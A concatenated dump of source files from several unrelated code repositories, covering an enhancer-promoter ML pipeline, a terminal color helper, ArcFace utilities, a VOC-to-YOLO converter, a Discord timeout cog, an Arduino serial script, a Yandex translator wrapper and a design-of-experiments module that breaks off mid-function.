Data_dir = '../data/epivan/%s/' % name
train = np.load(Data_dir + '%s_train.npz' % name)
# test=np.load(Data_dir+'%s_test.npz'%name)
X_en_tra, X_pr_tra, y_tra = train['X_en_tra'], train['X_pr_tra'], train['y_tra']
# X_en_tes,X_pr_tes,y_tes=test['X_en_tes'],test['X_pr_tes'],test['y_tes']
X_en_tra, X_en_val, X_pr_tra, X_pr_val, y_tra, y_val = train_test_split(
X_en_tra, X_pr_tra, y_tra, test_size=0.05, stratify=y_tra, random_state=250)
model = get_model()
model.summary()
    print('Training %s cell line specific model...' % name)
back = roc_callback(val_data=[X_en_val, X_pr_val, y_val], name=name)
history = model.fit([X_en_tra, X_pr_tra], y_tra, validation_data=([X_en_val, X_pr_val], y_val), epochs=15,
batch_size=64,
callbacks=[back])
t2 = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
    msg = name + " start time: " + t1 + " end time: " + t2 + " spend time: " + time_since(start)
print(msg)
msgs.append(msg)
for msg in msgs:
print(msg)
```
#### File: StackEPI/sequence_process/sequence_process_dpcp.py
```python
import os
import sys
root_path = os.path.abspath(os.path.dirname(__file__)).split('src')
sys.path.extend([root_path[0] + 'src'])
from sequence_process.DPCP import DPCP
import numpy as np
from sequence_process.sequence_process_def import get_cell_line_seq
names = ['GM12878', 'HeLa-S3', 'HUVEC', 'IMR90', 'K562', 'NHEK']
cell_name = names[5]  # the original index 7 is out of range for this six-element names list
feature_name = "dpcp"
data_source = "epivan"  # assumed value: get_cell_line_seq() and the branch below expect a data-source flag
feature_dir, \
enhancers_tra, promoters_tra, y_tra, \
im_enhancers_tra, im_promoters_tra, \
y_imtra, enhancers_tes, promoters_tes, y_tes = get_cell_line_seq(data_source, cell_name, feature_name)
set_pc_list = ["Base stacking", "Protein induced deformability", "B-DNA twist", "A-philicity", "Propeller twist",
"Duplex stability (freeenergy)", "Duplex stability (disruptenergy)", "DNA denaturation",
"Bending stiffness", "Protein DNA twist", "Stabilising energy of Z-DNA", "Aida_BA_transition",
"Breslauer_dG", "Breslauer_dH", "Breslauer_dS", "Electron_interaction", "Hartman_trans_free_energy",
"Helix-Coil_transition", "Ivanov_BA_transition", "Lisser_BZ_transition", "Polar_interaction"]
def get_data(enhancers, promoters):
dpcp = DPCP(2, set_pc_list, n_jobs=1)
X_en = dpcp.run_DPCP(enhancers)
# print(X_en)
X_pr = dpcp.run_DPCP(promoters)
# print(X_pr)
return np.array(X_en), np.array(X_pr)
"""
get and save
"""
X_en_tra, X_pr_tra = get_data(enhancers_tra, promoters_tra)
np.savez(feature_dir + '%s_train.npz' % cell_name, X_en_tra=X_en_tra, X_pr_tra=X_pr_tra, y_tra=y_tra)
if data_source == "epivan":
X_en_imtra, X_pr_imtra = get_data(im_enhancers_tra, im_promoters_tra)
np.savez(feature_dir + 'im_%s_train.npz' % cell_name, X_en_tra=X_en_imtra, X_pr_tra=X_pr_imtra, y_tra=y_imtra)
X_en_tes, X_pr_tes = get_data(enhancers_tes, promoters_tes)
np.savez(feature_dir + '%s_test.npz' % cell_name, X_en_tes=X_en_tes, X_pr_tes=X_pr_tes, y_tes=y_tes)
``` |
{
"source": "2004lkw/PyColorTerm",
"score": 4
} |
#### File: 2004lkw/PyColorTerm/colortxt.py
```python
class ColorsFore:
"""
colors for the terminal foreground
"""
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
PURPLE = 35
CYAN = 36
WHITE = 37
class ColorsBack:
"""
colors for the terminal background
"""
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
PURPLE = 45
CYAN = 46
WHITE = 47
class ColorsStyle:
"""
Styles used for the terminal.
"""
NONE = 0
_BRIGHT = 1
DARK = 2
ITALIC =3
UNDERLINE = 4
_LIGHTBACK = 5
_LIGHTBACK2 = 6
INVERT = 7
class ColorsCode:
"""
Escape codes used on the terminal.
"""
prefix = "\x1b["
postfix = "\x1b[0m"
def colorstr(style="NONE", fore="WHITE", back="BLACK", text=""):
"""
Formats a string with color codes and returns it.
:param style: Use none, dark, italic, underline or invert.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param back: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
# Style, Fore, Back. Set defaults.
useStyle = ColorsStyle.NONE
useFore = ColorsFore.WHITE
useBack = ColorsBack.BLACK
# make easier to decide.
style = style.lower().strip()
fore = fore.lower().strip()
back = back.lower().strip()
# figure out the style.
if style == "dark":
useStyle = ColorsStyle.DARK
elif style=="italic":
useStyle = ColorsStyle.ITALIC
elif style == "underline":
useStyle=ColorsStyle.UNDERLINE
elif style == "invert":
useStyle = ColorsStyle.INVERT
#Figure out the foreground.
if fore == "black":
useFore = ColorsFore.BLACK
elif fore == "green":
useFore = ColorsFore.GREEN
elif fore == "yellow":
useFore = ColorsFore.YELLOW
elif fore == "blue":
useFore = ColorsFore.BLUE
elif fore == "purple":
useFore = ColorsFore.PURPLE
elif fore == "cyan":
useFore = ColorsFore.CYAN
elif fore == "white":
useFore = ColorsFore.WHITE
elif fore == "red":
useFore = ColorsFore.RED
#Figure out the background.
if back == "black":
useBack = ColorsBack.BLACK
elif back == "green":
useBack = ColorsBack.GREEN
elif back == "yellow":
useBack = ColorsBack.YELLOW
elif back == "blue":
useBack = ColorsBack.BLUE
elif back == "purple":
useBack = ColorsBack.PURPLE
elif back == "cyan":
useBack = ColorsBack.CYAN
elif back == "white":
useBack = ColorsBack.WHITE
elif back == "red":
useBack = ColorsBack.RED
colorsOut = ";".join([str(useStyle),str(useFore),str(useBack)])
valOut = '%s%sm%s%s' % (ColorsCode.prefix,colorsOut,text,ColorsCode.postfix)
return valOut
def colortxt(fore="WHITE", back="BLACK", text=""):
"""
Formats a string with color codes and returns it using normal style.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param back: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
return colorstr("none",fore,back,text)
def foretxt(fore="WHITE", text = ""):
"""
Formats a string with color foreground on black.
:param fore: Use Black, Red, Green, Yellow, Blue, Purple, Cyan, or White.
:param text: This is the text you wish to format.
:returns: Returns the text, formatted with the codes needed to produce the colors.
"""
return colorstr(fore=fore,text=text)
``` |
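A short usage sketch of the helpers above, assuming the file is importable as `colortxt`; the escape sequences only render in ANSI-capable terminals:

```python
from colortxt import colorstr, colortxt, foretxt  # assumed module name

print(colorstr(style="underline", fore="yellow", back="blue", text="warning"))
print(colortxt(fore="green", text="ok"))
print(foretxt("red", "error"))

# The result is just the text wrapped in ANSI escape codes:
assert colortxt("white", "black", "x") == "\x1b[0;37;40mx\x1b[0m"
```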
{
"source": "2005606/arcface-tf2-new",
"score": 3
} |
#### File: arcface-tf2-new/modules/utils.py
```python
import yaml
import numpy as np
import tensorflow as tf
from absl import logging
def set_memory_growth():
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices(
'GPU')
logging.info(
"Detect {} Physical GPUs, {} Logical GPUs.".format(
len(gpus), len(logical_gpus)))
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
logging.info(e)
def load_yaml(load_path):
"""load yaml file"""
with open(load_path, 'r') as f:
loaded = yaml.load(f, Loader=yaml.Loader)
return loaded
def get_ckpt_inf(ckpt_path, steps_per_epoch):
"""get ckpt information"""
split_list = ckpt_path.split('e_')[-1].split('_b_')
epochs = int(split_list[0])
batchs = int(split_list[-1].split('.ckpt')[0])
steps = (epochs - 1) * steps_per_epoch + batchs
return epochs, steps + 1
def l2_norm(x, axis=1):
"""l2 norm"""
norm = np.linalg.norm(x, axis=axis, keepdims=True)
output = x / norm
return output
``` |
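A small sketch of `get_ckpt_inf` and `l2_norm`, assuming the module above is importable as `modules.utils` and that checkpoint files follow the `e_<epoch>_b_<batch>.ckpt` naming implied by the string splits:

```python
import numpy as np
from modules.utils import get_ckpt_inf, l2_norm  # assumed import path

epochs, steps = get_ckpt_inf("checkpoints/e_5_b_1000.ckpt", steps_per_epoch=2000)
print(epochs, steps)  # 5, (5 - 1) * 2000 + 1000 + 1 = 9001

x = np.array([[3.0, 4.0]])
print(l2_norm(x))  # [[0.6 0.8]] - each row scaled to unit length
```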
{
"source": "2007743/Converter-from-PASCAL-VOC-to-YOLO",
"score": 3
} |
#### File: 2007743/Converter-from-PASCAL-VOC-to-YOLO/Convertor UI.py
```python
import os
from PIL import Image
import PySimpleGUI as sg
def datafolder():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
foldername = sg.popup_get_folder(
            'Specify the path to the folder with the photos.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if foldername == '':
return
        folder = sg.popup_yes_no('Did you specify the path to the folder with the photos?', no_titlebar=True, grab_anywhere=True)
if folder == 'Yes':
if foldername is not None:
try:
print(foldername)
return foldername
except:
sg.popup_error('Error reading file')
return
elif folder != 'No':
break
def datacords():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
cordsname = sg.popup_get_file(
            'Specify the path to the file that lists the photo names followed by their coordinates.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if cordsname == '':
return
        cords = sg.popup_yes_no('Did you specify the path to the file with the photo names and coordinates?', no_titlebar=True, grab_anywhere=True)
if cords == 'Yes':
if cordsname is not None:
try:
print(cordsname)
return cordsname
except:
sg.popup_error('Error reading file')
return
elif cords != 'No':
break
def dataclasses():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
classesname = sg.popup_get_file(
            'Specify the path to the file listing the classes that will be used when training your neural '
            'network.', title='Conventor', no_titlebar=True, grab_anywhere=True)
if classesname == '':
return
        classes = sg.popup_yes_no('Did you specify the path to the file listing the classes that will be used '
                                  'when training the neural network?', no_titlebar=True, grab_anywhere=True)
if classes == 'Yes':
if classesname is not None:
try:
print(classesname)
return classesname
except:
sg.popup_error('Error reading file')
return
elif classes != 'No':
break
def dataimgclasses():
while True:
sg.set_options(auto_size_buttons=True)
sg.theme('dark grey 9')
imgclassesname = sg.popup_get_file(
            'Specify the path to the file listing the photo names and the classes given in the classes file.',
title='Conventor', no_titlebar=True, grab_anywhere=True)
if imgclassesname == '':
return
        imgclasses = sg.popup_yes_no('Did you specify the path to the file listing the photo names and the classes '
                                     'given in the classes file?', no_titlebar=True, grab_anywhere=True)
if imgclasses == 'Yes':
if imgclassesname is not None:
try:
print(imgclassesname)
return imgclassesname
except:
sg.popup_error('Error reading file')
break
elif imgclasses != 'No':
break
break
folder_images = datafolder()
size_images = dict()
line = open(f'{datacords()}', 'r').readlines()
naz = open(f'{dataimgclasses()}', 'r').readlines()
name1 = open(f"{dataclasses()}", 'r').readlines()
def convert(size, box):
dw = 1. / (size[0])
dh = 1. / (size[1])
x = (box[0] + box[1]) / 2.0 - 1
y = (box[2] + box[3]) / 2.0 - 1
w = box[1] - box[0]
h = box[3] - box[2]
x = x * dw
w = w * dw
y = y * dh
h = h * dh
return (x, y, w, h)
def razresh(name):
try:
for dirpath, _, filenames in os.walk(folder_images):
for path_image in filenames:
image = os.path.abspath(os.path.join(dirpath, path_image))
try:
with Image.open(image) as img:
width, heigth = img.size
size_images[path_image] = {'width': width, 'heigth': heigth}
except:
a = 'wqewqeqwe'
s = size_images.get(f'{name}.jpg')
return s.get("width"), s.get("heigth")
except:
a = "qweqwewqe"
def nazv1():
nazv = {}
for x in naz:
t = x.split(" ", maxsplit=1)
nazv.update({str(t[0]): str(t[1].rstrip())})
return nazv
def convertor():
for f in line:
name = {}
i = f.rstrip().split(' ')
xywh = float(i[1]), float(i[3]), float(i[2]), float(i[4])
nazvanie = i[0]
if os.path.isfile(
f'{folder_images}\{nazvanie}.jpg'): # Specify the path to the folder where the images are located
if not os.path.isfile(
                    f'{folder_images}\{nazvanie}.txt'):  # skip photos that already have a YOLO description file next to them (the original leading '.' made this check a different path than the one written below)
youlo = convert(razresh(nazvanie), (xywh))
nazv3 = nazv1()[nazvanie]
for x, rt in enumerate(name1):
name.update({rt.rstrip(): x})
if x == 69:
name23 = name[nazv3]
o = open(f'{folder_images}\{nazvanie}.txt',
'w') # Specify the path the same path that you specified before
o1 = o.write(f'{name23} {youlo[0]} {youlo[1]} {youlo[2]} {youlo[3]}')
else:
v = 0
if __name__ == '__main__':
datacords()
dataclasses()
dataimgclasses()
convertor()
``` |
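`convert()` turns absolute PASCAL VOC box coordinates into YOLO's normalized center/width/height format; note that, as the function reads its arguments, the box tuple is ordered `(xmin, xmax, ymin, ymax)`. A worked example, assuming `convert()` from the script above is in scope:

```python
# size = (width, height), box = (xmin, xmax, ymin, ymax)
x, y, w, h = convert((640, 480), (100, 300, 50, 250))
print(round(x, 4), round(y, 4), round(w, 4), round(h, 4))
# 0.3109 0.3104 0.3125 0.4167 -> written per line as "<class> 0.3109 0.3104 0.3125 0.4167"
```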
{
"source": "200percentmicky/MickyCogs",
"score": 3
} |
#### File: MickyCogs/timeouts/timeouts.py
```python
from datetime import datetime, timedelta
import discord
from redbot.core import commands, modlog, checks
class InTimeout(Exception):
"""
Exception for when a member is on timeout.
"""
pass
class NotInTimeout(Exception):
"""
Exception for when a member is not in timeout.
"""
pass
class TimeExceeded(Exception):
"""
Raised when the time provided exceeds the limits of 28 days. (40320 minutes)
"""
pass
def timeout_payload(until: timedelta = None):
"""
Initial payload to provide to the API.
"""
timeout = (datetime.utcnow() + until).isoformat() if until else None
payload = {'communication_disabled_until': timeout}
return payload
async def timeout_user(bot, user_id: int, guild_id: int, reason: str, until):
"""
Timeout users in minutes.
"""
if until > timedelta(days=28):
raise TimeExceeded()
member = await bot.http.get_member(guild_id, user_id)
if member['communication_disabled_until'] is None:
return await bot.http.edit_member(guild_id, user_id, reason=reason, **timeout_payload(until - timedelta(seconds=1)))
else:
raise InTimeout()
async def untimeout_user(bot, user_id: int, guild_id: int, reason: str):
"""
Removes the timeout from the user.
"""
member = await bot.http.get_member(guild_id, user_id)
if member['communication_disabled_until'] is not None:
return await bot.http.edit_member(guild_id, user_id, reason=reason, **timeout_payload(None))
else:
raise NotInTimeout()
class Timeouts(commands.Cog):
"""
Timeouts for Red V3
"""
def __init__(self, bot):
self.bot = bot
async def initialize(self):
await self.register_casetypes()
@staticmethod
async def register_casetypes():
timeout_types = [
{
"name": "timeout",
"default_setting": True,
"image": "\N{TIMER CLOCK}",
"case_str": "Timed Mute"
},
{
"name": "remove_timeout",
"default_setting": True,
"image": "💥",
"case_str": "Remove Timed Mute"
}
]
try:
await modlog.register_casetypes(timeout_types)
except RuntimeError:
pass
@commands.command()
@checks.mod() # Recommended. The library doesn't have the "Moderate Members" permission stored, so bits will be used.
async def timeout(
self,
ctx: commands.Context,
member: discord.Member,
until: commands.TimedeltaConverter,
*,
reason: str = None
):
"""
Puts a member on timeout with the time specified in minutes.
`<member>` The member you want to put on timeout.
`<until>` How long the member should be on timeout in minutes.
`[reason]` The reason for the timeout.
"""
if ctx.author.id == member.id:
return await ctx.send("You can't place yourself on timeout.")
try:
async with ctx.typing():
await timeout_user(self.bot, user_id=member.id, guild_id=ctx.guild.id, until=until, reason=reason)
await modlog.create_case(
ctx.bot, ctx.guild, ctx.message.created_at, action_type="timeout",
user=member, moderator=ctx.author, reason=reason,
until=datetime.utcnow() + until - timedelta(seconds=1)
)
await ctx.send("Done. Time away will do them good.")
except discord.Forbidden:
            await ctx.send("I'm not allowed to do that for some reason.")
except TimeExceeded:
await ctx.send("Invalid time given. Max time is 28 days.")
except InTimeout:
await ctx.send("That member is already on timeout.")
@commands.command()
@checks.mod() # Recommended. The library doesn't have the "Moderate Members" permission stored, so bits will be used.
async def untimeout(self, ctx: commands.Context, member: discord.Member, *, reason: str = None):
"""
Removes a members timeout, if one is in place.
`<member>` The member you want to remove the timeout from.
`[reason]` The reason for removing their timeout.
"""
if ctx.author.id == member.id:
return await ctx.send("You can't place yourself on timeout.")
try:
async with ctx.typing():
await untimeout_user(self.bot, user_id=member.id, guild_id=ctx.guild.id, reason=reason)
await modlog.create_case(
ctx.bot, ctx.guild, ctx.message.created_at, action_type="remove_timeout",
user=member, moderator=ctx.author, reason=reason
)
await ctx.send(f"Done. Hope they learned their lesson.")
except discord.Forbidden:
            await ctx.send("I'm not allowed to do that.")
except NotInTimeout:
await ctx.send("That member is not in timeout.")
``` |
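`timeout_payload()` builds the body sent to Discord: an ISO-8601 `communication_disabled_until` timestamp to start a timeout, or `None` to lift it. The actual HTTP calls need a running Red bot, so only the payload helper is sketched here, assuming it is in scope:

```python
from datetime import timedelta

print(timeout_payload(timedelta(minutes=10)))
# {'communication_disabled_until': '<utcnow + 10 minutes, ISO-8601>'}

print(timeout_payload(None))
# {'communication_disabled_until': None}
```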
{
"source": "2010019970909/Arduino-PWM-Serial-Control",
"score": 3
} |
#### File: Arduino-PWM-Serial-Control/Python_Control/main.py
```python
from time import sleep
import serial
import serial.tools.list_ports
DELAY = 0.1
PORT_INDEX = 0
def main():
# List ports
ports = [comport.device for comport in serial.tools.list_ports.comports()]
n_ports = len(ports)
print('Ports list:', ports)
if n_ports:
# Open port
with serial.Serial(ports[PORT_INDEX], 115200) as ser:
print(ser.readline().decode('UTF8'), end='')
# Increase and decrease a value from 0 to 255
while 1:
for i in range(0, 256):
ser.write(str(i).encode('UTF8'))
print(ser.readline().decode('UTF8'), end='')
sleep(DELAY)
for i in range(1, 255):
ser.write(str(255 - i).encode('UTF8'))
print(ser.readline().decode('UTF8'), end='')
sleep(DELAY)
if __name__ == '__main__':
main()
``` |
{
"source": "2010019970909/deep-translator",
"score": 3
} |
#### File: deep-translator/deep_translator/yandex.py
```python
import requests
from .constants import BASE_URLS
from .exceptions import (RequestError, ServerException,
TranslationNotFound, TooManyRequests)
from .parent import BaseTranslator
class YandexTranslator(object):
"""
class that wraps functions, which use the yandex translator under the hood to translate word(s)
"""
def __init__(self, api_key=None, source="en", target="de", **kwargs):
"""
@param api_key: your yandex api key
"""
if not api_key:
raise ServerException(401)
self.__base_url = BASE_URLS.get("YANDEX")
self.source = source
self.target = target
self.api_key = api_key
self.api_version = "v1.5"
self.api_endpoints = {
"langs": "getLangs",
"detect": "detect",
"translate": "translate",
}
@staticmethod
def get_supported_languages(as_dict=False, **kwargs):
""" this method is just for consistency."""
return """ this method is just for consistency. You need to create an instance of yandex and access
supported languages using the languages property or call _get_supported_languages
"""
def _get_supported_languages(self):
return set(x.split("-")[0] for x in self.dirs)
@property
def languages(self):
return self.get_supported_languages()
@property
def dirs(self, proxies=None):
try:
url = self.__base_url.format(
version=self.api_version, endpoint="getLangs")
print("url: ", url)
response = requests.get(
url, params={"key": self.api_key}, proxies=proxies)
except requests.exceptions.ConnectionError:
raise ServerException(503)
else:
data = response.json()
if response.status_code != 200:
raise ServerException(response.status_code)
return data.get("dirs")
def detect(self, text, proxies=None):
response = None
params = {
"text": text,
"format": "plain",
"key": self.api_key,
}
try:
url = self.__base_url.format(
version=self.api_version, endpoint="detect")
response = requests.post(url, data=params, proxies=proxies)
except RequestError:
raise
except ConnectionError:
raise ServerException(503)
except ValueError:
raise ServerException(response.status_code)
else:
response = response.json()
language = response['lang']
status_code = response['code']
if status_code != 200:
raise RequestError()
elif not language:
raise ServerException(501)
return language
def translate(self, text, proxies=None, **kwargs):
params = {
"text": text,
"format": "plain",
"lang": self.target if self.source == "auto" else "{}-{}".format(self.source, self.target),
"key": self.api_key
}
try:
url = self.__base_url.format(
version=self.api_version, endpoint="translate")
response = requests.post(url, data=params, proxies=proxies)
except ConnectionError:
raise ServerException(503)
else:
response = response.json()
if response['code'] == 429:
raise TooManyRequests()
if response['code'] != 200:
raise ServerException(response['code'])
if not response['text']:
raise TranslationNotFound()
return response['text']
def translate_file(self, path, **kwargs):
"""
translate from a file
@param path: path to file
@return: translated text
"""
try:
with open(path, 'r', encoding='utf-8') as f:
text = f.read()
return self.translate(text)
except Exception as e:
raise e
def translate_batch(self, batch, **kwargs):
"""
translate a batch of texts
@param batch: list of texts to translate
@return: list of translations
"""
return [self.translate(text, **kwargs) for text in batch]
BaseTranslator.register(YandexTranslator)
``` |
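A short usage sketch; the translator performs live HTTP requests against the Yandex API, so a valid API key (placeholder below) and network access are required. The top-level import path is assumed:

```python
from deep_translator import YandexTranslator  # assumed public import path

translator = YandexTranslator(api_key="your-yandex-api-key", source="en", target="de")
print(translator.translate("How are you?"))
print(translator.translate_batch(["hello", "world"]))
```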
{
"source": "2010019970909/design_of_experiments",
"score": 3
} |
#### File: design_of_experiments/src/design_of_experiments.py
```python
__author__ = "<NAME>"
# Maths modules
from itertools import permutations, combinations
from scipy.special import erfinv
import numpy as np
# Plotting module
import matplotlib.pyplot as plt
def gen_design(n: int = 2, perm=None):
"""
Generate the design matrix for factorial design of experiments (2**n)
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
"""
set_matrix = set()
for i in range(n + 1):
# https://stackoverflow.com/a/41210386 for the permutation
# https://stackoverflow.com/a/29648719 for the update of the set
set_matrix.update(set(permutations((n-i)*[-1] + i*[1])))
# Tranform the matrix to fit the example (Table 10.4.1)
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html to flip the matrix along the Y axis
if perm:
return np.flip(np.array(sorted(set_matrix, reverse=True)))[perm]
return np.flip(np.array(sorted(set_matrix, reverse=True)))
def gen_X(n: int = 2, perm=None, show: bool = False, return_head: bool = False):
"""
    Generate the X matrix to compute the a_i coefficients for a 2**n DoE.
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
show:
If True print the head and the matrix X and return (X, head)
Else only return X
return_head:
If True, return (X, head)
"""
DoE = gen_design(n=n, perm=perm)
X = np.c_[(2**n)*[1], DoE]
if show:
head = ['I']
for i in range(n):
# Generate the combinations for i position
combs = sorted(set(combinations(range(1, n+1), i+1)))
for comb in combs:
# Generate the column name
head.append(str(list(comb)).replace('[', '').replace(
']', '').replace(' ', '').replace(',', '•'))
for i in range(n-1):
# Generate the combinations for i+2 position
combs = sorted(set(combinations(range(n), i+2)))
for comb in combs:
# Generate the column by combination
temp_col = (2**n)*[1]
for j in list(comb):
temp_col = np.multiply(temp_col, DoE[:, j])
# Add the column to the matrix
X = np.c_[X, temp_col]
if show:
print(head)
print(X)
return X, head
if return_head:
return X, head
return X
def gen_a_labels(n: int = 2):
"""
Generate a list of labels for the a_i coefficients.
n:
The number of factors to analyse
"""
head = [r'$\^a_{0}$']
for i in range(n):
# Generate the combinations for i position
combs = sorted(set(combinations(range(1, n+1), i+1)))
for comb in combs:
# Generate the column name
head.append(r"$\^a_{" + str(list(comb)).replace('[', '').replace(
']', '').replace(' ', '').replace(',', r' \cdot ') + "}$")
return head
def gen_X_hat(n: int = 2, perm=None, show: bool = False):
"""
Generate the matrix X_hat = (X^T * X)^-1 * X^T
n:
The number of factors to analyse
perm:
A permutation vector of size 2**n
show:
If True print the head, the matrix X and X_hat
Else only return X_hat
"""
if show:
X, _ = gen_X(n=n, perm=perm, show=show)
else:
X = gen_X(n=n, perm=perm, show=show)
X_hat = np.dot(np.linalg.inv(np.dot(X.T, X)), X.T)
if show:
print(X_hat)
return X_hat
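# Usage sketch (mirrors the calls made in main() below): given a vector of
# measured responses y of length 2**n, the least-squares effect estimates are
#   a_hat = np.dot(gen_X_hat(n), y)
# and the fitted responses are recovered with np.dot(gen_X(n), a_hat).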
def draw_coefficents(mpl, coefficents, coefficents_labels=None, remove_a0: bool = False, title: str = "Coefficients bar chart", legend: str = "Coefficients", draw: bool = True, **kwargs):
"""
Draw the bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.)
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
x = np.arange(len(coefficents))
n = int(np.log2(len(coefficents)))
if coefficents_labels:
labels = coefficents_labels
else:
labels = gen_a_labels(n)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
x = np.arange(len(coefficents))
# mpl.figure()
mpl.ax.clear()
rects = mpl.ax.bar(x, coefficents, **kwargs)
for rect in rects:
height = rect.get_height()
if height < 0:
va = 'top'
xytext = (0, -3)
else:
va = 'bottom'
xytext = (0, 3)
mpl.ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
mpl.ax.set_title(title)
mpl.ax.set_xticks(x)
mpl.ax.set_xticklabels(labels)
# mpl.ax.grid(which='major')
mpl.ax.legend([legend])
# mpl.tight_layout()
if draw:
mpl.draw()
def plot_coefficents(coefficents, coefficents_labels=None, remove_a0: bool = False, title: str = "Coefficients bar chart", legend: str = "Coefficients", block: bool = False, show: bool = False, **kwargs):
"""
Plot the bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
        Defines whether the plot should block execution of the code or not.
    show:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.)
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
x = np.arange(len(coefficents))
n = int(np.log2(len(coefficents)))
if coefficents_labels:
labels = coefficents_labels
else:
labels = gen_a_labels(n)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
x = np.arange(len(coefficents))
fig, ax = plt.subplots()
rects = ax.bar(x, coefficents, **kwargs)
for rect in rects:
height = rect.get_height()
if height < 0:
va = 'top'
xytext = (0, -3)
else:
va = 'bottom'
xytext = (0, 3)
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
ax.set_title(title)
ax.set_xticks(x)
ax.set_xticklabels(labels)
# ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def draw_pareto(mpl, coefficents, coefficents_labels=None, remove_a0: bool = True, title: str = "Pareto bar chart", legend: str = "| Coefficients |", draw: bool = True, **kwargs):
"""
Draw the Pareto's bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.).
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
l = len(coefficents)
y = np.arange(l)
n = int(np.log2(l))
coefficents = np.abs(coefficents)
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
y = np.arange(len(coefficents))
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=True)
coefficents = coefficents[index]
labels = labels[index]
# mpl.figure()
mpl.ax.clear()
rects = mpl.ax.barh(y, coefficents, **kwargs)
i = 0
for rect in rects:
x = rect.get_width()
va = 'center'
if i == 0:
xytext = (-4*len(str(x)), 0)
else:
xytext = (4*len(str(x)), 0)
mpl.ax.annotate('{}'.format(x),
xy=(x, i),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
i += 1
mpl.ax.set_title(title)
mpl.ax.set_yticks(y)
mpl.ax.set_yticklabels(labels)
# ax.grid(which='major')
mpl.ax.legend([legend])
# mpl.ax.autoscale_view(True,True,True)
# fig.tight_layout()
if draw:
mpl.draw()
def plot_pareto(coefficents, coefficents_labels=None, remove_a0: bool = True, title: str = "Pareto bar chart", legend: str = "| Coefficients |", block: bool = False, show: bool = False, **kwargs):
"""
Plot the Pareto's bar chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
        Defines whether the plot should block execution of the code or not.
    show:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.).
"""
# https://matplotlib.org/3.1.1/gallery/lines_bars_and_markers/barchart.html
l = len(coefficents)
y = np.arange(l)
n = int(np.log2(l))
coefficents = np.abs(coefficents)
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
y = np.arange(len(coefficents))
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=True)
coefficents = coefficents[index]
labels = labels[index]
fig, ax = plt.subplots()
rects = ax.barh(y, coefficents, **kwargs)
i = 0
for rect in rects:
x = rect.get_width()
va = 'center'
if i == 0:
xytext = (-4*len(str(x)), 0)
else:
xytext = (4*len(str(x)), 0)
ax.annotate('{}'.format(x),
xy=(x, i),
xytext=xytext, # 3 points vertical offset
textcoords="offset points",
ha='center', va=va)
i += 1
ax.set_title(title)
ax.set_yticks(y)
ax.set_yticklabels(labels)
# ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def draw_henry(mpl, coefficents, coefficents_labels=None, remove_a0: bool = True, empirical_cumulative_distribution: str = "classical", a: float = 0, title: str = "Henry bar chart", legend: str = "| Coefficients |", draw: bool = True, **kwargs):
"""
